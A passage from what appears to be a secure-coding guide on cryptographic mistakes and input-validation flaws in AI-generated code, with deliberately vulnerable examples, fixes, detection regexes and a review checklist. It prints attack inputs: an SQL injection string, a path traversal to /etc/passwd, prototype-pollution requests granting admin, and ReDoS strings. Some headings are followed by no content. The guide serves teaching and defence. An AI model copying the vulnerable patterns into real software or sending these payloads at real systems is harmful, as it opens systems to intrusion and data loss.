// Compare HMACs of the MACs - timing doesn't leak original MAC
return HMAC_SHA256(key, providedMac) == HMAC_SHA256(key, expectedMac)
Lessons learned:
// VULNERABLE: Same key for encryption and authentication
SHARED_KEY = loadKey("master")
function encryptData(data):
return AES_GCM_encrypt(SHARED_KEY, generateNonce(), data)
function signData(data):
return HMAC_SHA256(SHARED_KEY, data) // Same key!
// Problem: Cryptographic interactions between uses
// Some attacks become possible when key is used in multiple algorithms
// VULNERABLE: Same key for different users/tenants
function encryptForTenant(tenantId, data):
return AES_GCM_encrypt(MASTER_KEY, generateNonce(), data)
// All tenants share encryption key - one compromise = all compromised
// SECURE: Derive separate keys for each purpose
MASTER_KEY = loadKey("master")
function getEncryptionKey():
return HKDF_Expand(MASTER_KEY, "encryption-aes-256-gcm", 32)
function getAuthenticationKey():
return HKDF_Expand(MASTER_KEY, "authentication-hmac-sha256", 32)
function getSearchKey():
return HKDF_Expand(MASTER_KEY, "searchable-encryption", 32)
// SECURE: Per-tenant key derivation
function getTenantEncryptionKey(tenantId):
// Each tenant gets unique derived key
info = "tenant-encryption:" + tenantId
return HKDF_Expand(MASTER_KEY, info, 32)
function encryptForTenantSecure(tenantId, data):
tenantKey = getTenantEncryptionKey(tenantId)
return AES_GCM_encrypt(tenantKey, generateNonce(), data)
Lessons learned:
// COMMON MISTAKE: CBC encryption without HMAC
function encryptDataWrong(data, key):
iv = generateSecureRandom(16)
ciphertext = AES_CBC_encrypt(key, iv, data)
return iv + ciphertext
// Missing: No way to detect tampering!
// Attack: Bit-flipping in CBC mode
// Flipping bit N in ciphertext block C[i] flips bit N in plaintext block P[i+1] (and garbles P[i])
// Attacker can modify data without detection
// Example: Encrypted JSON {"admin": false, "amount": 100}
// Attacker can flip bits to change "false" to "true" or modify amount
// CORRECT: Encrypt-then-MAC
function encryptDataCorrect(data, encKey, macKey):
iv = generateSecureRandom(16)
ciphertext = AES_CBC_encrypt(encKey, iv, data)
// MAC covers IV and ciphertext
mac = HMAC_SHA256(macKey, iv + ciphertext)
return iv + ciphertext + mac
function decryptDataCorrect(encrypted, encKey, macKey):
iv = encrypted[:16]
mac = encrypted[-32:]
ciphertext = encrypted[16:-32]
// Verify MAC FIRST, before any decryption
expectedMac = HMAC_SHA256(macKey, iv + ciphertext)
if not constantTimeEquals(mac, expectedMac):
throw IntegrityError("Data has been tampered with")
return AES_CBC_decrypt(encKey, iv, ciphertext)
// BETTER: Just use GCM which includes authentication
function encryptDataBest(data, key):
nonce = generateSecureRandom(12)
ciphertext, tag = AES_GCM_encrypt(key, nonce, data)
return nonce + ciphertext + tag
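The verify-before-decrypt framing of Encrypt-then-MAC can be exercised without a cipher by treating the ciphertext as opaque bytes. In this sketch the `seal` and `open_sealed` names, the placeholder IV, and the placeholder ciphertext are assumptions; the actual AES-CBC step would come from a vetted crypto library.

```python
import hashlib
import hmac

IV_LEN, MAC_LEN = 16, 32


def seal(iv: bytes, ciphertext: bytes, mac_key: bytes) -> bytes:
    """Frame as iv || ciphertext || HMAC(iv || ciphertext)."""
    mac = hmac.new(mac_key, iv + ciphertext, hashlib.sha256).digest()
    return iv + ciphertext + mac


def open_sealed(blob: bytes, mac_key: bytes):
    """Check the MAC first; only then hand (iv, ciphertext) to the decryptor."""
    if len(blob) < IV_LEN + MAC_LEN:
        raise ValueError("blob too short")
    iv, ciphertext, mac = blob[:IV_LEN], blob[IV_LEN:-MAC_LEN], blob[-MAC_LEN:]
    expected = hmac.new(mac_key, iv + ciphertext, hashlib.sha256).digest()
    if not hmac.compare_digest(mac, expected):
        raise ValueError("integrity check failed")
    return iv, ciphertext


mac_key = b"m" * 32                       # placeholder MAC key
blob = seal(bytes(16), b"opaque-ciphertext-bytes", mac_key)

tampered = bytearray(blob)
tampered[20] ^= 0x01                      # flip one ciphertext bit
try:
    open_sealed(bytes(tampered), mac_key)
    detected = False
except ValueError:
    detected = True
print(detected)
```

Because the MAC is checked before any decryption or padding removal, a bit-flipped ciphertext never reaches the code that could act as a padding oracle.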
Solution:
// COMMON MISTAKE: Base64 as "encryption"
function fakeEncryptData(sensitiveData):
return base64Encode(sensitiveData) // NOT ENCRYPTION!
function fakeDecryptData(encodedData):
return base64Decode(encodedData)
// COMMON MISTAKE: XOR with short key as encryption
function fakeEncryptWithXor(data, password):
key = password.repeat(ceil(length(data) / length(password)))
return xor(data, key) // Trivially broken with frequency analysis
// COMMON MISTAKE: ROT13 or character substitution
function fakeEncryptText(text):
return rot13(text) // No security at all
// COMMON MISTAKE: Obfuscation ≠ encryption
function storeApiKey(apiKey):
obfuscated = ""
for char in apiKey:
obfuscated += chr(ord(char) + 5) // Just shifted characters
return obfuscated
// COMMON MISTAKE: Custom "encryption" algorithm
function myEncrypt(data, key):
result = ""
for i, char in enumerate(data):
newChar = chr((ord(char) + ord(key[i % len(key)]) * 7) % 256)
result += newChar
return result // Easily broken - don't invent crypto!
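How little these schemes protect can be shown in a few lines. In the sketch below the secret, the XOR key, and the attacker's knowledge of the `api_key=` prefix and of the key length are all assumptions chosen for the demonstration.

```python
import base64
from itertools import cycle


def xor_repeat(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key (the broken scheme under test)."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


secret = b"api_key=sk_test_1234567890"

# Base64: anyone can decode it, no key involved.
encoded = base64.b64encode(secret)
decoded = base64.b64decode(encoded)

# Repeating-key XOR: a known plaintext prefix hands over the key.
xor_key = b"hunter"
xored = xor_repeat(secret, xor_key)
known_prefix = b"api_key="                     # attacker guesses the format
keystream = xor_repeat(xored[:len(known_prefix)], known_prefix)
recovered_key = keystream[:len(xor_key)]       # key length assumed known
recovered_secret = xor_repeat(xored, recovered_key)

print(decoded == secret, recovered_key, recovered_secret == secret)
```

When the key length is not known, it can usually be inferred from repetitions in the keystream or from statistical tests on the ciphertext.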
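Reality check:
| Method | Security level | Use case |
|---|---|---|
| Base64 | 0 (none) | Binary-to-text encoding only |
| ROT13 | 0 (none) | Jokes, hiding spoilers |
| XOR with a repeating key | Trivially broken | Never use |
| Homegrown "encryption" | Unknown, likely broken | Never use |
| AES-GCM with a random key | Strong | Actual encryption |
Solution: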
// COMMON MISTAKE: Logging the key
function generateAndStoreKey():
key = generateSecureRandom(32)
log.info("Generated new encryption key: " + hexEncode(key)) // LOGGED!
return key
// COMMON MISTAKE: Key in config file committed to git
// config.json:
{
"database_url": "...",
"encryption_key": "a1b2c3d4e5f6..." // Will be in git history forever
}
// COMMON MISTAKE: Key passed inline as an environment variable
// Launching: ENCRYPTION_KEY=secret123 ./myapp
// The value lands in shell history, and on Linux it is readable through
// /proc/<pid>/environ or `ps e` by the same user and by root
// COMMON MISTAKE: Key stored in database alongside encrypted data
function storeEncryptedData(userId, sensitiveData):
key = generateSecureRandom(32)
encrypted = AES_GCM_encrypt(key, generateNonce(), sensitiveData)
database.insert("user_data", {
user_id: userId,
encrypted_data: encrypted,
encryption_key: key // KEY NEXT TO DATA = pointless encryption
})
// COMMON MISTAKE: Key derivation material stored insecurely
function setupEncryption(password):
salt = generateSecureRandom(16)
key = deriveKey(password, salt)
// Storing in easily accessible location
localStorage.setItem("encryption_salt", salt)
localStorage.setItem("derived_key", key) // KEY IN BROWSER STORAGE!
Secure key storage patterns:
// SECURE: Using a key management service (KMS)
function storeKeySecurely(keyId, keyMaterial):
// AWS KMS, Azure Key Vault, GCP KMS, HashiCorp Vault
kms.storeKey(keyId, keyMaterial, {
rotation_period: "90 days",
deletion_protection: true,
access_policy: restrictedPolicy
})
// SECURE: Key wrapped with hardware security module (HSM)
function wrapKeyForStorage(dataKey):
wrappingKey = hsm.getWrappingKey() // Never leaves HSM
wrappedKey = hsm.wrapKey(dataKey, wrappingKey)
return wrappedKey // Safe to store - can only unwrap with HSM
// SECURE: Envelope encryption pattern
function envelopeEncrypt(data):
// Generate data encryption key (DEK)
dek = generateSecureRandom(32)
// Encrypt data with DEK
encryptedData = AES_GCM_encrypt(dek, generateNonce(), data)
// Encrypt DEK with key encryption key (KEK) from KMS
encryptedDek = kms.encrypt(dek)
// Store encrypted DEK with encrypted data
return {
encrypted_data: encryptedData,
encrypted_key: encryptedDek, // DEK is encrypted, safe to store
kms_key_id: kms.getCurrentKeyId()
}
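| Algorithm | Key size | Use case | Notes |
|---|---|---|---|
| AES-256-GCM | 256 bits | General purpose | Recommended default, 96-bit nonce |
| ChaCha20-Poly1305 | 256 bits | Mobile, performance-sensitive platforms | Faster without AES-NI hardware |
| XChaCha20-Poly1305 | 256 bits | High-volume encryption | 192-bit nonce, safe to generate randomly |
| AES-256-GCM-SIV | 256 bits | Nonce-misuse resistance | Slightly slower, but safer under accidental nonce reuse |
Avoid: DES, 3DES, RC4, Blowfish, AES-ECB, AES-CBC without HMAC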
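| Algorithm | Memory | Use case | Notes |
|---|---|---|---|
| Argon2id | 64+ MB | New applications | Best protection, memory-hard |
| bcrypt | N/A | Legacy compatibility | Widely supported, cost 12+ |
| scrypt | 64+ MB | When Argon2 is unavailable | Good alternative |
Avoid: MD5, SHA-1, SHA-256 (single round), PBKDF2 with fewer than 600,000 iterations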
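| Algorithm | Use case | Notes |
|---|---|---|
| Argon2id | Password-based | Best for password → key |
| HKDF | Key expansion | Derives multiple keys from a single key |
| PBKDF2-SHA256 | Compatibility | Requires 600,000+ iterations |
Avoid: MD5-based KDFs, single-pass hash derivation, low iteration counts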
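As a rough illustration of the PBKDF2 row, the Python standard library exposes `hashlib.pbkdf2_hmac`. The sketch below derives a 32-byte key with a random salt and the 600,000-iteration floor from the table. The function names and the convention of returning the salt alongside the key are assumptions; where a maintained Argon2id library is available, the table still favors it.

```python
import hashlib
import hmac
import os
from typing import Optional, Tuple

ITERATIONS = 600_000  # floor taken from the table above


def derive_key(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Derive a 32-byte key; returns (salt, key). A fresh salt is generated if none is given."""
    if salt is None:
        salt = os.urandom(16)
    key = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), salt, ITERATIONS, dklen=32
    )
    return salt, key


def verify_password(password: str, salt: bytes, expected_key: bytes) -> bool:
    """Re-derive with the stored salt and compare in constant time."""
    _, candidate = derive_key(password, salt)
    return hmac.compare_digest(candidate, expected_key)
```

The salt is not secret and can be stored next to the derived value; the password itself is never stored.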
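| Algorithm | Output | Use case | Notes |
|---|---|---|---|
| HMAC-SHA256 | 256 bits | General purpose | Standard choice |
| HMAC-SHA512 | 512 bits | Extra security margin | Faster on 64-bit systems |
| Poly1305 | 128 bits | With ChaCha20 | Part of the AEAD construction |
Avoid: MD5, SHA-1, plain hashes without an HMAC construction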
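| Algorithm | Use case | Notes |
|---|---|---|
| Ed25519 | General purpose | Fast, secure, simple API |
| ECDSA P-256 | Compatibility | Widely supported |
| RSA-PSS | Legacy systems | Requires keys of 2048 bits or more |
Avoid: RSA PKCS#1 v1.5, DSA, ECDSA with weak curves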
// RED FLAGS in cryptographic code:
// 1. Weak hash functions
md5( // Search for: md5\s*\(
sha1( // Search for: sha1\s*\(
SHA1.Create() // Search for: SHA1
// 2. ECB mode
mode = "ECB" // Search for: ECB
AES/ECB/ // Search for: /ECB/
mode_ECB // Search for: ECB
// 3. Static or weak IVs
iv = [0, 0, 0, ... // Search for: iv\s*=\s*\[0
IV = "0000 // Search for: IV\s*=\s*["']0
static IV // Search for: static.*[Ii][Vv]
// 4. Math.random for security
Math.random() // Search for: Math\.random
random.randint( // Search for: randint\( (context matters)
// 5. Weak secrets
= "secret" // Search for: =\s*["']secret
SECRET = " // Search for: SECRET\s*=\s*["']
= "password" // Search for: =\s*["']password
// 6. Direct password use as key
key = password // Search for: key\s*=\s*password
AES(password) // Search for: AES\s*\(\s*password
// 7. Low iteration counts
iterations: 1000 // Search for: iterations.*\d{1,4}[^0-9]
rounds = 100 // Search for: rounds\s*=\s*\d{1,3}[^0-9]
// GREP patterns for security review:
// [Mm][Dd]5\s*\(
// [Ss][Hh][Aa]1\s*\(
// ECB
// [Ii][Vv]\s*=\s*\[0
// Math\.random
// iterations.*[0-9]{1,4}[^0-9]
// (password|secret)\s*=\s*["']
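The grep patterns above can also be run from a script. This Python sketch compiles a subset of them and reports matching line numbers. The rule names and the `scan_source` function are hypothetical, and hits are only leads for manual review, since a pattern as broad as `ECB` will produce false positives.

```python
import re
from typing import List, Tuple

# Patterns copied from the list above; the rule names are illustrative.
RULES = {
    "weak-hash-md5": re.compile(r"[Mm][Dd]5\s*\("),
    "weak-hash-sha1": re.compile(r"[Ss][Hh][Aa]1\s*\("),
    "ecb-mode": re.compile(r"ECB"),
    "zero-iv": re.compile(r"[Ii][Vv]\s*=\s*\[0"),
    "insecure-random": re.compile(r"Math\.random"),
    "hardcoded-secret": re.compile(r"(password|secret)\s*=\s*[\"']"),
}


def scan_source(text: str) -> List[Tuple[int, str]]:
    """Return (line_number, rule_name) for every rule that matches a line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in RULES.items():
            if pattern.search(line):
                findings.append((lineno, name))
    return findings
```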
// Cryptographic security test cases:
// 1. Algorithm verification
- [ ] No MD5 or SHA1 for password hashing
- [ ] No ECB mode encryption
- [ ] AES key size is 256 bits (not 128)
- [ ] Authenticated encryption used (GCM, ChaCha20-Poly1305)
// 2. Randomness verification
- [ ] IVs/nonces are cryptographically random
- [ ] Session tokens use CSPRNG
- [ ] No predictable seeds for random generation
// 3. Key management
- [ ] Keys not hardcoded in source
- [ ] Keys not logged or exposed in errors
- [ ] Key derivation uses appropriate KDF
- [ ] Key rotation mechanism exists
// 4. Password hashing
- [ ] bcrypt cost ≥ 12 or Argon2 with appropriate params
- [ ] Unique salt per password
- [ ] Timing-safe comparison used
// 5. Implementation details
- [ ] Constant-time comparison for secrets
- [ ] No padding oracle vulnerabilities
- [ ] HMAC used (not hash(key+message))
- [ ] Authenticated encryption or encrypt-then-MAC
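CWE references: CWE-20 (Improper Input Validation), CWE-1286 (Improper Validation of Syntactic Correctness of Input), CWE-185 (Incorrect Regular Expression), CWE-1333 (Inefficient Regular Expression Complexity), CWE-129 (Improper Validation of Array Index)
Priority score: 21 (frequency: 9, severity: 7, detectability: 5)
Input validation is the first line of defense against nearly all injection attacks, data corruption, and application crashes. Yet AI-generated code routinely fails to implement proper validation, either treating it as an afterthought or omitting it entirely.
Why AI models skip or get input validation wrong:
Training data focuses on the happy path: Most tutorial code, documentation examples, and Stack Overflow answers demonstrate functionality with expected input. Validation code is usually omitted for brevity, which teaches the model that validation is optional.
Validation is context-dependent: Correct validation depends on business rules, data types, and downstream use, and the model often lacks that context. It cannot know that a "name" field should not exceed 100 characters or that "age" must fall between 0 and 150.
Client-side validation looks complete: Training data frequently contains client-side form validation (JavaScript). The model learns these patterns without grasping that server-side validation is the real security boundary.
Regex complexity: AI-generated regular expressions can be vulnerable to catastrophic backtracking (ReDoS) or can miss edge cases. The model optimizes for matching expected patterns, not for rejecting malicious ones.
Trust boundary confusion: The model has no inherent knowledge of which data sources are trusted. It may validate user form input yet trust data from internal APIs, databases, or message queues, any of which may also be compromised.
Type system overconfidence: In typed languages, the model may assume that type declarations are sufficient validation, overlooking the need for range checks, format validation, and semantic constraints.
Why this matters (the foundation of all injection attacks):
Every major vulnerability class stems from insufficient input validation:
Impact statistics: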
// VULNERABLE: All validation in frontend, server trusts everything
// Frontend validation (JavaScript)
function validateForm(form):
if form.email is empty:
showError("Email required")
return false
if not isValidEmail(form.email):
showError("Invalid email format")
return false
if form.password.length < 8:
showError("Password must be 8+ characters")
return false
if form.age < 0 or form.age > 150:
showError("Invalid age")
return false
// Form is "valid", submit to server
return true
// Backend endpoint (VULNERABLE - no validation)
function handleRegistration(request):
// AI assumes frontend validated, so just use the data
email = request.body.email // Could be anything
password = request.body.password // Could be empty
age = request.body.age // Could be -1 or 9999999
// Directly store in database
query = "INSERT INTO users (email, password, age) VALUES (?, ?, ?)"
database.execute(query, [email, hashPassword(password), age])
return {"success": true}
Why this is dangerous:
Attack scenario:
// Attacker sends directly to API:
POST /api/register
Content-Type: application/json
{
"email": "'; DROP TABLE users; --",
"password": "",
"age": -9999999999
}
// VULNERABLE: Validates type exists, ignores business constraints
function processPayment(request):
// Type checking only
if typeof(request.amount) != "number":
return error("Amount must be a number")
if typeof(request.quantity) != "integer":
return error("Quantity must be an integer")
// MISSING: Range validation
// amount could be negative (refund attack)
// quantity could be 0 or MAX_INT (business logic bypass)
total = request.amount * request.quantity
chargeCustomer(request.customerId, total)
return {"charged": total}
// Attacker exploits:
{
"amount": -100.00, // Negative = credit instead of charge
"quantity": 999999999, // Integer overflow potential
"customerId": "12345"
}
Why this is dangerous:
// VULNERABLE: Regex matches substring, not entire input
// Email validation without anchors
EMAIL_PATTERN = "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}"
function validateEmail(email):
if regex.match(EMAIL_PATTERN, email):
return true
return false
// This PASSES validation:
validateEmail("MALICIOUS_PAYLOAD user@example.com MALICIOUS_PAYLOAD")
// Because "user@example.com" matches somewhere in the string
// Filename validation without anchors
SAFE_FILENAME = "[a-zA-Z0-9_-]+"
function validateFilename(filename):
if regex.match(SAFE_FILENAME, filename):
return true
return false
// This PASSES validation:
validateFilename("../../../etc/passwd")
// Because "etc" matches the pattern somewhere in the string
Why this is dangerous:
Fix preview:
// SECURE: Use ^ and $ anchors to match entire input
EMAIL_PATTERN = "^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$"
SAFE_FILENAME = "^[a-zA-Z0-9_-]+$"
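A quick way to see the difference is to run both variants. In this Python sketch `re.search` stands in for substring-style matching, while `re.fullmatch` enforces whole-input matching whether or not the pattern carries anchors. The helper names are assumptions; the inputs are the ones used above.

```python
import re

EMAIL_UNANCHORED = r"[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}"
SAFE_FILENAME_UNANCHORED = r"[a-zA-Z0-9_-]+"


def loose_match(pattern: str, value: str) -> bool:
    """Substring semantics: true if the pattern occurs anywhere in value."""
    return re.search(pattern, value) is not None


def strict_match(pattern: str, value: str) -> bool:
    """Whole-input semantics: the pattern must consume the entire value."""
    return re.fullmatch(pattern, value) is not None
```

In Python, `$` also matches just before a trailing newline, which is one more reason to prefer `re.fullmatch` (or `\Z`) over a hand-written `^...$` when validating input.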
// VULNERABLE: Catastrophic backtracking regex patterns
// Email validation with ReDoS vulnerability
// Pattern: nested quantifiers with overlapping character classes
VULNERABLE_EMAIL = "^([a-zA-Z0-9]+)*@[a-zA-Z0-9]+\.[a-zA-Z]+$"
// Attack input: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!"
// The regex engine backtracks exponentially trying all combinations
// URL validation with ReDoS
VULNERABLE_URL = "^(https?:\/\/)?([\da-z\.-]+)\.([a-z\.]{2,6})([\/\w \.-]*)*\/?$"
// Attack input: long string of valid URL characters followed by invalid character
// "http://example.com/" + "a" * 30 + "!"
// Naive duplicate word finder (common tutorial example)
DUPLICATE_WORDS = "\b(\w+)\s+\1\b"
// Can hang on: "word word word word word word word word word word!"
function validateInput(input, pattern):
// This can hang for minutes or crash the server
return regex.match(pattern, input)
Why this is dangerous:
Nested quantifiers such as `(a+)+`, `(a*)*`, and `(a?)*` are red flags.
ReDoS complexity analysis:
// Pattern: (a+)+$
// Input: "aaaaaaaaaaaaaaaaaaaaaaaaX"
//
// For 25 'a's followed by 'X':
// - The engine tries every possible way to split the 'a's between groups
// - Time complexity: O(2^n) where n is input length
// - 25 chars = 33 million+ combinations to try
// - 30 chars = 1 billion+ combinations
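The doubling can be reproduced with a small counting model. The Python sketch below does not run a real regex engine; it is a simplified model of how a backtracking matcher explores `(a+)+$` against `n` copies of `a` followed by a non-matching character, trying every length for each group and failing at the end each time. The function name and the model itself are assumptions made for illustration.

```python
def count_attempts(n: int) -> int:
    """Count match attempts in a simplified backtracking model of (a+)+$ on 'a' * n + 'X'.

    Each call represents the engine standing at a position with `remaining`
    'a' characters left. It tries every possible length for the next a+ group,
    recurses, and always fails at the trailing 'X'.
    """
    calls = 0

    def attempt(remaining: int) -> None:
        nonlocal calls
        calls += 1
        for group_len in range(remaining, 0, -1):  # greedy: longest group first
            attempt(remaining - group_len)

    attempt(n)
    return calls


growth = [count_attempts(n) for n in (5, 10, 15)]  # each +5 multiplies the work by 32
```

In this model the count is exactly 2^n, so 25 characters give 33,554,432 attempts, in line with the figure quoted above. Real engines differ in constant factors and may apply optimizations, but the exponential shape is the point.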
// VULNERABLE: Assumes data structure completeness
function processUserProfile(user):
// No null checks - any missing field crashes
fullName = user.firstName + " " + user.lastName // Crash if null
emailDomain = user.email.split("@")[1] // Crash if email is null
age = parseInt(user.profile.age) // Crash if profile is null
// Process address (deeply nested)
city = user.profile.address.city.toUpperCase() // Multiple crash points
return {
"name": fullName,
"domain": emailDomain,
"age": age,
"city": city
}
// API returns partial data:
{
"firstName": "John",
"lastName": null, // Could be null
"email": null, // Could be missing
"profile": {
"age": "25"
// address is missing entirely
}
}
Why this is dangerous:
// VULNERABLE: Using user input directly as array index
function getItemByIndex(request):
items = ["item0", "item1", "item2", "item3", "item4"]
index = request.params.index // User-provided
// No validation - trusts user to provide valid index
return items[index] // Out of bounds or negative index
// Worse: Array index used for data access
function getUserData(request):
userIndex = parseInt(request.params.id)
// Could access negative index, other users' data, or crash
return allUsersData[userIndex]
// Object property access from user input
function getConfigValue(request):
configKey = request.params.key
// Prototype pollution or access to __proto__, constructor
return config[configKey]
Why this is dangerous:
Keys such as `__proto__`, `constructor`, and `prototype` can modify object behavior.
Attack scenario:
// Array out of bounds:
GET /items?index=99999999
GET /items?index=-1
// Prototype pollution via property access:
GET /config?key=__proto__
GET /config?key=constructor
POST /config {"key": "__proto__", "value": {"isAdmin": true}}
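A defensive counterpart to the lookups above might bound-check the index and restrict property access to an explicit allowlist. The Python sketch below is illustrative: `ITEMS`, `CONFIG`, `PUBLIC_CONFIG_KEYS`, and both function names are assumptions. Python has no prototype chain, but the same allowlist idea keeps unexpected keys from reaching internal state.

```python
ITEMS = ["item0", "item1", "item2", "item3", "item4"]
CONFIG = {"theme": "dark", "locale": "en-US", "internal_api_url": "http://10.0.0.5"}
PUBLIC_CONFIG_KEYS = frozenset({"theme", "locale"})  # allowlist of readable keys


def get_item_by_index(raw_index: str) -> str:
    """Parse a user-supplied index and reject anything outside 0..len-1."""
    # isdigit() alone accepts some non-ASCII digits, so require ASCII as well.
    if not raw_index.isascii() or not raw_index.isdigit():
        raise ValueError("index must be a non-negative integer")
    index = int(raw_index)
    if index >= len(ITEMS):
        raise ValueError("index out of range")
    return ITEMS[index]


def get_config_value(key: str) -> str:
    """Only return values for keys that were explicitly marked public."""
    if key not in PUBLIC_CONFIG_KEYS:
        raise KeyError("unknown config key")
    return CONFIG[key]
```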
// SECURE: Comprehensive server-side validation with clear error messages
function handleRegistration(request):
errors = []
// Email validation
email = request.body.email
if email is null or email is empty:
errors.append({"field": "email", "message": "Email is required"})
else if length(email) > 254: // RFC 5321 limit
errors.append({"field": "email", "message": "Email too long"})
else if not isValidEmailFormat(email):
errors.append({"field": "email", "message": "Invalid email format"})
else if not isAllowedEmailDomain(email): // Business rule
errors.append({"field": "email", "message": "Email domain not allowed"})
// Password validation
password = request.body.password
if password is null or password is empty:
errors.append({"field": "password", "message": "Password is required"})
else if length(password) < 12:
errors.append({"field": "password", "message": "Password must be 12+ characters"})
else if length(password) > 128: // Prevent DoS via bcrypt
errors.append({"field": "password", "message": "Password too long"})
else if not meetsComplexityRequirements(password):
errors.append({"field": "password", "message": "Password too weak"})
// Age validation (integer with business range)
age = request.body.age
if age is null:
errors.append({"field": "age", "message": "Age is required"})
else if typeof(age) != "integer":
errors.append({"field": "age", "message": "Age must be a whole number"})
else if age < 13: // Business rule: minimum age
errors.append({"field": "age", "message": "Must be at least 13 years old"})
else if age > 150: // Sanity check
errors.append({"field": "age", "message": "Invalid age"})
// Return all errors at once (better UX than one at a time)
if errors.length > 0:
return {"success": false, "errors": errors}
// Only process after validation passes
hashedPassword = hashPassword(password)
createUser(email, hashedPassword, age)
return {"success": true}
Why this is secure:
// SECURE: Declarative schema validation with robust library
// Define schema once, reuse everywhere
USER_REGISTRATION_SCHEMA = {
"type": "object",
"required": ["email", "password", "age", "name"],
"additionalProperties": false, // Reject unknown fields
"properties": {
"email": {
"type": "string",
"format": "email",
"maxLength": 254
},
"password": {
"type": "string",
"minLength": 12,
"maxLength": 128
},
"age": {
"type": "integer",
"minimum": 13,
"maximum": 150
},
"name": {
"type": "object",
"required": ["first", "last"],
"properties": {
"first": {
"type": "string",
"minLength": 1,
"maxLength": 100,
"pattern": "^[\\p{L}\\s'-]+$" // Unicode letters, spaces, hyphens, apostrophes
},
"last": {
"type": "string",
"minLength": 1,
"maxLength": 100,
"pattern": "^[\\p{L}\\s'-]+$"
}
}
}
}
}
function handleRegistration(request):
// Validate entire payload against schema
validationResult = schemaValidator.validate(request.body, USER_REGISTRATION_SCHEMA)
if not validationResult.valid:
return {
"success": false,
"errors": validationResult.errors // Detailed error per field
}
// Data is guaranteed to match schema structure and constraints
processRegistration(request.body)
return {"success": true}
// Additional business logic validation after schema validation
function processRegistration(data):
// Schema ensures structure; now check business rules
if isEmailAlreadyRegistered(data.email):
throw ValidationError("Email already registered")
if isCommonPassword(data.password):
throw ValidationError("Password is too common")
createUser(data)
Why this is secure:
`additionalProperties: false` prevents unexpected data injection.
// SECURE: Anchored, bounded, and ReDoS-resistant patterns
// Email validation - anchored and bounded
// Note: Perfect email validation is complex; often better to just check format
// and verify via confirmation email
EMAIL_PATTERN = "^[a-zA-Z0-9._%+-]{1,64}@[a-zA-Z0-9.-]{1,253}\\.[a-zA-Z]{2,63}$"
// Safe filename - anchored, limited character set, bounded length
FILENAME_PATTERN = "^[a-zA-Z0-9][a-zA-Z0-9._-]{0,254}$"
// Safe identifier (alphanumeric + underscore, starts with letter)
IDENTIFIER_PATTERN = "^[a-zA-Z][a-zA-Z0-9_]{0,63}$"
// URL path segment - no special characters
PATH_SEGMENT_PATTERN = "^[a-zA-Z0-9._-]{1,255}$"
function validateWithSafeRegex(input, pattern, maxLength):
// Length check BEFORE regex (prevents ReDoS)
if input is null or length(input) > maxLength:
return false
// Use timeout-protected regex matching if available
try:
return regexMatchWithTimeout(pattern, input, timeout = 100ms)
catch TimeoutException:
logWarning("Regex timeout on input: " + truncate(input, 50))
return false
// For complex patterns, use atomic groups or possessive quantifiers
// (syntax varies by regex engine)
// VULNERABLE: (a+)+
// SAFE: (?>a+)+ (atomic group - no backtracking into group)
// SAFE: a++ (possessive quantifier - never backtracks)
// Alternative: Linear-time regex engines (RE2, rust regex)
// These reject patterns that could have exponential complexity
function validateWithLinearRegex(input, pattern):
// RE2 guarantees O(n) matching time
return RE2.match(pattern, input)
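Why this is secure:
The `^` and `$` anchors ensure the whole input is matched, and the patterns avoid overlapping adjacent quantified classes (such as `[a-zA-Z0-9]+` next to `[a-z]+`).
// SECURE: Explicit type handling with safe coercion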
function parseIntegerSafe(value, min, max):
// Handle null/undefined
if value is null or value is undefined:
return {valid: false, error: "Value is required"}
// If already integer, validate range
if typeof(value) == "integer":
if value < min or value > max:
return {valid: false, error: "Value out of range: " + min + "-" + max}
return {valid: true, value: value}
// If string, parse carefully
if typeof(value) == "string":
// Check for valid integer string (no floats, no hex, no scientific)
if not regex.match("^-?[0-9]+$", value):
return {valid: false, error: "Invalid integer format"}
parsed = parseInt(value, 10) // Always specify radix
// Check for NaN (parsing failure)
if isNaN(parsed):
return {valid: false, error: "Could not parse integer"}
// Check for overflow
if parsed < MIN_SAFE_INTEGER or parsed > MAX_SAFE_INTEGER:
return {valid: false, error: "Integer overflow"}
// Range check
if parsed < min or parsed > max:
return {valid: false, error: "Value out of range: " + min + "-" + max}
return {valid: true, value: parsed}
// Reject all other types
return {valid: false, error: "Expected integer, got " + typeof(value)}
// Usage
function handlePayment(request):
amountResult = parseIntegerSafe(request.body.amount, 1, 1000000) // 1 cent to $10,000
if not amountResult.valid:
return error("amount: " + amountResult.error)
quantityResult = parseIntegerSafe(request.body.quantity, 1, 100)
if not quantityResult.valid:
return error("quantity: " + quantityResult.error)
// Safe to use validated integers
total = amountResult.value * quantityResult.value
processPayment(total)
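In Python the same idea needs extra care because the built-in `int()` is permissive: it accepts surrounding whitespace, underscores such as `1_000`, and non-ASCII digits. A strict sketch could look like the following, where `parse_integer_safe` is an assumed name, the 18-digit cap is an arbitrary illustrative bound, and `bool` is rejected explicitly because it is a subclass of `int`.

```python
import re
from typing import Union

_INT_RE = re.compile(r"-?[0-9]{1,18}")  # ASCII digits only, bounded length


def parse_integer_safe(value: Union[int, str, None], minimum: int, maximum: int) -> int:
    """Return a validated int within [minimum, maximum] or raise ValueError."""
    if value is None or isinstance(value, bool):
        raise ValueError("integer required")
    if isinstance(value, str):
        # fullmatch rejects floats, hex, exponents, whitespace, and underscores
        if not _INT_RE.fullmatch(value):
            raise ValueError("invalid integer format")
        value = int(value)
    elif not isinstance(value, int):
        raise ValueError("expected integer, got " + type(value).__name__)
    if value < minimum or value > maximum:
        raise ValueError("value out of range")
    return value
```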
Why this is secure:
// SECURE: Allowlist approach - only accept known-good values
// For enum-like fields, use explicit allowlist
ALLOWED_COUNTRIES = ["US", "CA", "GB", "DE", "FR", "JP", "AU"]
ALLOWED_ROLES = ["user", "moderator", "admin"]
ALLOWED_SORT_FIELDS = ["name", "date", "price", "rating"]
ALLOWED_FILE_EXTENSIONS = [".jpg", ".jpeg", ".png", ".gif", ".pdf"]
function validateCountry(input):
// Case-insensitive comparison against allowlist
normalized = input.toUpperCase().trim()
if normalized in ALLOWED_COUNTRIES:
return {valid: true, value: normalized}
